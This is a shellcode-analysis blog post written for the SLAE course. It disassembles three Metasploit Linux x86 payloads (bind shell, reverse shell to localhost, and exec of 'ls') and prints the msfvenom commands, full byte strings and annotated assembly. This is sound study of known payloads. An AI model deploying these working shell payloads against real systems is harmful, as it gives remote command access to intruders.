SLAE Assignment 5 -- MSF Analysis
Introduction
The 5th assignment for SLAE is to analyze 3 msfvenom payloads. For this excercise, I thought I would revisit some semi-familiar code in the:
linux/x86/shell_bind_tcp
,linux/x86/shell_reverse_tcp
, andlinux/x86/exec
payloads.
My primary reason for doing this is because we’ve written similar code already and I want to see how the pros do it when contributing to Metasploit and see if we can pick up some new tricks/efficiencies.
Analyzing Shellcode #1 (linux/x86/shell_bind_tcp
)
The first thing we need to do is generate the shellcode that corresponds with this MSF payload. We’ll need to add arguments as well, such as designate a listening port. We can do this with the following command: msfvenom -p linux/x86/shell_bind_tcp lport=5555 -f c
root@kali:~# msfvenom -p linux/x86/shell_bind_tcp lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes
Final size of c file: 354 bytes
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x15\xb3\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
Now that we have our shellcode, we can feed it to ndisasm
, which comes stock on Kali Linux, with the following command and get some assembly out of it!
root@kali:~# echo -ne "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x15\xb3\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" | ndisasm -u -
After running this command, we get the following output:
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 5B pop ebx
00000010 5E pop esi
00000011 52 push edx
00000012 68020015B3 push dword 0xb3150002
00000017 6A10 push byte +0x10
00000019 51 push ecx
0000001A 50 push eax
0000001B 89E1 mov ecx,esp
0000001D 6A66 push byte +0x66
0000001F 58 pop eax
00000020 CD80 int 0x80
00000022 894104 mov [ecx+0x4],eax
00000025 B304 mov bl,0x4
00000027 B066 mov al,0x66
00000029 CD80 int 0x80
0000002B 43 inc ebx
0000002C B066 mov al,0x66
0000002E CD80 int 0x80
00000030 93 xchg eax,ebx
00000031 59 pop ecx
00000032 6A3F push byte +0x3f
00000034 58 pop eax
00000035 CD80 int 0x80
00000037 49 dec ecx
00000038 79F8 jns 0x32
0000003A 682F2F7368 push dword 0x68732f2f
0000003F 682F62696E push dword 0x6e69622f
00000044 89E3 mov ebx,esp
00000046 50 push eax
00000047 53 push ebx
00000048 89E1 mov ecx,esp
0000004A B00B mov al,0xb
0000004C CD80 int 0x80
This output is very nice, but it’s not quite what we’re accustomed to. Let’s use awk
to get just the assembly instructions.
echo -ne "<SHELLCODE>" | ndisasm -u - | awk '{ print $3,$4,$5 }'
Now we get just the assembly to print to the terminal and we can throw this into a NASM sytnax highlighter.
xor ebx,ebx
mul ebx
push ebx
inc ebx
push ebx
push byte +0x2
mov ecx,esp
mov al,0x66
int 0x80
pop ebx
pop esi
push edx
push dword 0xb3150002
push byte +0x10
push ecx
push eax
mov ecx,esp
push byte +0x66
pop eax
int 0x80
mov [ecx+0x4],eax
mov bl,0x4
mov al,0x66
int 0x80
inc ebx
mov al,0x66
int 0x80
xchg eax,ebx
pop ecx
push byte +0x3f
pop eax
int 0x80
dec ecx
jns 0x32
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
int 0x80
Let’s break this down and see how it differs from our bind shell that we wrote.
The first thing we’ll notice is repeated use of the same syscall socketcall()
instead of 4 separate syscalls like we did. sockecall()
works by storing a SYS_CALL
value in ebx
, creating the arguments on the stack for the subordinate syscall (like bind or listen for example), and then having ecx
point to esp
where the beginning of the arguments are located. It’s a much more uniform and in my opinion clean way of executing the shellcode.
Syscall 1 socketcall()
with SYS_SOCKET
First, let’s look at the argument structure of socketcall()
. The man page gives the argument structure as int socketcall(int call, unsigned long *args);
. call
can be satisfied with a reference to what socket function you want to use, in thise case we’ll want to use SYS_SOCKET
which has a value of 1
, and then we’ll input arguments to satisfy the SYS_SOCKET
call as we’re familiar with from our code.
Let’s look at how this plays out in assembly.
xor ebx,ebx
mul ebx
push ebx
inc ebx
push ebx
push byte +0x2
mov ecx,esp
mov al,0x66
int 0x80
One thing that’s different is the way they’re clearing the registers. By using mul
which has storage destinations of eax
and edx
, they’re able to save a line of code by not having to specify xor register, register
twice.
Next they increment ebx
so that it will equal 0x1
and satisfy the SYS_SOCKET
argument. It was pushed onto the stack before incrementing to satisfy the protocol value needed for SYS_SOCKET
which should be 0
as it was in our bind shell. ebx
is then pushed onto the stack to satisfy the SOCK_STREAM
argument as we did. Then a value of 0x2
, to represent the value of PF_INET
, is pushed onto the stack just as we did.
Lastly, ecx
is given the address of esp
so that it references our arguments that we just created on the stack and then the interrupt is called. Also, let’s not forget that the sockfd
will be needed later and that’s stored in eax
by default.
Syscall 2 socketcall()
with SYS_BIND
This is the structure from the man page on bind()
: int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
As we know already, building this struct in reverse order on the stack is the most difficult part of the entire shellcode.
int sockfd
is taken care of, thats stored ineax
.- the struct will consist of
0
(0.0.0.0 listening address),0xb315
(port 5555), andAF_INET
(2). socklen_t addrlen
will be 16
Let’s see how they pulled this off in the assembly.
pop ebx ; I like this, this pops 0x2 into $ebx and satisfies our SYS_BIND requirement
pop esi ; not sure what this is doing yet
push edx ; $edx is still zeroed out so this will be the beginning of our struct (0.0.0.0)
push dword 0xb3150002 ; putting our listening port (5555) onto the stack and our AF_INET value (2)
push byte +0x10 ; finishing up with pushing 16 length onto the stack
push ecx ; pushing a pointer to our sockaddr
push eax ; this is our sockfd, or did you forget?!
mov ecx,esp ; ecx has to point to the location of all these args we've created
push byte +0x66
pop eax ; calling socketcall()
int 0x80
Awesome, not too many unique things there, though I will say for the most part they make more use of pushing values onto the stack and then popping them into register than I have.
Syscall 3 socketcall()
with SYS_LISTEN
If you don’t remember, the argument structure for listen()
is listen(sockfd, queueLimit)
. This part of the code is pretty self-explanatory. ecx
will point to the args by default because it’s not touched in this code segement and is still referencing esp
from previous code segment.
mov [ecx+0x4],eax ; [ecx+0x4] is going to reference a location on the stack so we're placing our sockfd onto the stack
mov bl,0x4 ; for SYS_LISTEN which has a value of 4
mov al,0x66 ; calling socketcall()
int 0x80
Syscall 4 socketcall()
with SYS_ACCEPT
The unique thing about accept()
is that it will generate a new sockfd
for us instead of the one we’ve been using that we’ll need to store and reference.
inc ebx ; ebx now becomes 5 for SYS_ACCEPT
mov al,0x66
int 0x80
Again, ecx
already points to the beginning of the arguments so we’re good to go.
Syscall 5 dup2()
dup2()
is going to take a sockfd
created from our accept()
call and then duplicate the 0, 1, and 2 file descriptors in the ecx
registers which correspond to stdin, stdout, stderr respectively in order to make the shell interactive. Let’s see how they implement this.
xchg eax,ebx ; $ebx now has our new sockfd
pop ecx ; this is going to be our counter register
push byte +0x3f ; pushing the syscall value for dup2()
pop eax
int 0x80 ; done calling dup2()
dec ecx ; decrement our counter
jns 0x32 ; jump near if not sign, a.k.a. SF=0
Lesson learned here, the original ndisasm output told us that 0x32
was a reference to:
00000032 6A3F push byte +0x3f
So now we know if that condition is not meant, this is where we loop back to. Very cool way of constructing the loop.
Syscall 6 execve()
This syscall is one of the most standardized syscalls you can make in assembly so I doubt there will be much variance here.
push dword 0x68732f2f ; pushing 'hs//' onto the stack
push dword 0x6e69622f ; pushing 'nib/' onto the stack, now we have /bin//sh on the stack!
mov ebx,esp ; $ebx now points to the string we want to execute
push eax ; terminator
push ebx ; push the value of the previous stack pointer onto the stack
mov ecx,esp ; save new stack pointer
mov al,0xb
int 0x80
Some things we picked up for our future code writing:
- the
mul
register clear to save bytes - creatively utilizing the stack to avoid
mov
operations - utilizing
socketcall()
instead of separate syscalls - utilizing the
xchg
opcode
Analyzing Shellcode #1 (linux/x86/reverse_bind_tcp
)
The first thing we need to do is generate the shellcode that corresponds with this MSF payload. We’ll need to add arguments as well, such as designate a listening port. We can do this with the following command: msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f c
root@kali:~# msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68"
"\x02\x00\x15\xb3\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
Run our ndisasm command:
root@kali:~# echo -ne "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68\x02\x00\x15\xb3\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |ndisasm -u -
Output:
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 93 xchg eax,ebx
00000010 59 pop ecx
00000011 B03F mov al,0x3f
00000013 CD80 int 0x80
00000015 49 dec ecx
00000016 79F9 jns 0x11
00000018 687F000001 push dword 0x100007f
0000001D 68020015B3 push dword 0xb3150002
00000022 89E1 mov ecx,esp
00000024 B066 mov al,0x66
00000026 50 push eax
00000027 51 push ecx
00000028 53 push ebx
00000029 B303 mov bl,0x3
0000002B 89E1 mov ecx,esp
0000002D CD80 int 0x80
0000002F 52 push edx
00000030 686E2F7368 push dword 0x68732f6e
00000035 682F2F6269 push dword 0x69622f2f
0000003A 89E3 mov ebx,esp
0000003C 52 push edx
0000003D 53 push ebx
0000003E 89E1 mov ecx,esp
00000040 B00B mov al,0xb
00000042 CD80 int 0x80
Let’s use cut out the assembly with by piping the output to awk
with: echo -ne "<SHELLCODE>" | ndisasm -u -| awk '{print $3,$4,$5,$6}'
and paste it into nasm syntax highlighter.
xor ebx,ebx
mul ebx
push ebx
inc ebx
push ebx
push byte +0x2
mov ecx,esp
mov al,0x66
int 0x80
xchg eax,ebx
pop ecx
mov al,0x3f
int 0x80
dec ecx
jns 0x11
push dword 0x100007f
push dword 0xb3150002
mov ecx,esp
mov al,0x66
push eax
push ecx
push ebx
mov bl,0x3
mov ecx,esp
int 0x80
push edx
push dword 0x68732f6e
push dword 0x69622f2f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0xb
int 0x80
Alright, let’s analyze this code. As you have probably already figured out, they’re using socketcall()
again. This should be familiar territory for us at this point.
Syscall 1 socketcall()
with SYS_SOCKET
Let’s keep in mind the argument structure for SYS_SOCKET
: socket(PF_INET (2), SOCK_STREAM (1), IPPROTO_IP (0))
xor ebx,ebx ; clear out ebx
mul ebx ; clear out eax and edx
push ebx ; pushing 0 onto stack for the IPPROTO_IP
inc ebx ; pushing 1 onto the stack for SOCK_STREAM
push ebx
push byte +0x2 ; pushing 2 onto the stack for PF_INET
mov ecx,esp ; $ecx has to point at our args location
mov al,0x66
int 0x80
xchg eax,ebx ; storing the sockfd in ebx
We are getting good at this! Most of this makes sense to us at this point and matches up nicely with our bind shell analysis.
Syscall 2 dup2()
This is interesting, it looks like this code calls dup2()
before connect()
which is different from our code.
mov al,0x3f ; 0x3f is the value for dup2
int 0x80 ; call dup2
dec ecx ; decrese counter register
jns 0x11 ; jump near if not sign
This is a similar set-up to our dup2()
loop in the MSF bind shell that we evaluated. 0x11
here is just a reference to the location of that first instruction mov al,0x3f
so as it loops through its iterations if the jns
condition is not satisfied it will continue to loop. Here’s the relevant line from the ndisasm dump:
00000011 B03F mov al,0x3f
Syscall 3 socketcall()
with SYS_CONNECT
connect()
behaves very similarly to bind()
so keep in mind the argument structure for both, particularly the struct portion: int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
.
push dword 0x100007f ; pushing 127.0.0.1 remote IP
push dword 0xb3150002 ; pushing port 5555 and AF_INET
mov ecx,esp ; pointing $ecx to the struct's location on the stack
mov al,0x66 ; socketcall()
push eax
push ecx ; sockaddr_in* addr
push ebx ; pushing the sockfd
mov bl,0x3 ; SYS_CONNECT
mov ecx,esp
int 0x80
This is all pretty familiar to the code we analyzed for the MSF bind payload.
Syscall 4 execve()
This is similar to the MSF bind payload we analyzed, but not identical.
push edx ; pushing a null terminator onto the stack
push dword 0x68732f6e ; pushing 'hs//' onto the stack
push dword 0x6e69622f ; pushing 'nib/' onto the stack, now we have /bin//sh on the stack!
mov ebx,esp ; preserving this stack pointer in $ebx
push edx ; another null terminator
push ebx ; the stack pointer address we had stored in $ebx
mov ecx,esp ; $ecx has to have the address of the stack pointer for our completed args
mov al,0xb ; execve()
int 0x80
All in all there were the same lessons learned. It emphasizes more succicnt assembly. Why use 3 lines of code when you can accomplish the same goal in 2? There are definitely some areas we can improve our code going forward.
Analyzing Shellcode #3 (linux/x86/exec
)
For this payload you have specify a CMD
parameter which will represent an arbitrary command you want to run on the victim host. Let’s choose ls
as our command and see how the folks contributing to Metasploit pull this off with their shellcode.
root@kali:~# msfvenom -p linux/x86/exec CMD=ls -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 38 bytes
Final size of c file: 185 bytes
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80";
Let’s plug the shellcode into ndisasm and dump the assembly code with the following command:
root@kali:~# echo -ne "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c\x73\x00\x57\x53\x89\xe1\xcd\x80" | ndisasm -u -
Output:
00000000 6A0B push byte +0xb
00000002 58 pop eax
00000003 99 cdq
00000004 52 push edx
00000005 66682D63 push word 0x632d
00000009 89E7 mov edi,esp
0000000B 682F736800 push dword 0x68732f
00000010 682F62696E push dword 0x6e69622f
00000015 89E3 mov ebx,esp
00000017 52 push edx
00000018 E803000000 call 0x20
0000001D 6C insb
0000001E 7300 jnc 0x20
00000020 57 push edi
00000021 53 push ebx
00000022 89E1 mov ecx,esp
00000024 CD80 int 0x80
Using our aforementioned awk
command to just retrieve the assembly for syntax highlighting.
push byte +0xb
pop eax
cdq
push edx
push word 0x632d
mov edi,esp
push dword 0x68732f
push dword 0x6e69622f
mov ebx,esp
push edx
call 0x20
insb
jnc 0x20
push edi
push ebx
mov ecx,esp
int 0x80
Ok, let’s jump into some analysis. Right off the bat we see they are using execve
by placing 0xb
into eax
. Let’s look at the next section of code.
cdq ; this will clear $edx to zero, a clever new trick for us
push edx ; push a null onto the stack
push word 0x632d ; pushing the string for '-c' onto the stack which will be used along with '/bin/sh' to specify our 'ls' cmd
mov edi,esp ; store a stack pointer to our arg structure into $edi
push dword 0x68732f
push dword 0x6e69622f ; pushing '/bin/sh' onto the stack
mov ebx,esp ; storing this stack pointer to this arg structure in ebx
push edx ; push null onto stack
This is relatively familiar to us so far. Let’s go deeper.
call 0x20 ; call here to the instruction at 0x20 which is 'push edi' which we stored our stack pointer in
insb
jnc 0x20
insb
and jnc 0x20
are very interesting. Let’s examine the value stored there from our ndisasm ouput:
0000001D 6C insb
0000001E 7300 jnc 0x20
A hex converter will tell us that 6C
is l
while 73
is s
. So this is how the program get’s ls
onto the stack followed by the 00
terminator. A call
opcode will store the address of the next command onto the stack, so we’ve successfully placed the address of our command onto the stack. This is a very cool trick we can begin to incorporate into our shellcode.
Let’s finish up.
push edi ; pushes $edi onto the stack which stores the address of '-c' remember
push ebx ; pushes address of '/bin/sh' onto stack
mov ecx,esp ; finally, this will move into $ecx the stack pointer which will complete the entire command '/bin/sh -c ls'
int 0x80
Lessons Learned
Using a call to store instruction addresses on the stack is a very cool trick that we were familiar with from writing JMP CALL POP
shellcode, but I needed reminding that it is valuable outside of decoder stub construction!
Another thing was that linux/x86/shell_reverse_tcp
and linux/x86/exec
shellcode had several NULL BYTEs. This is a great reminder to specify bad characters when generating payloads with msfvenom
.
This was a great excercise and it was very fun to look at how the shellcode we use everyday generated from msfvenom
actually works.
Github
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1458
You can find all of the code used in this blog post here.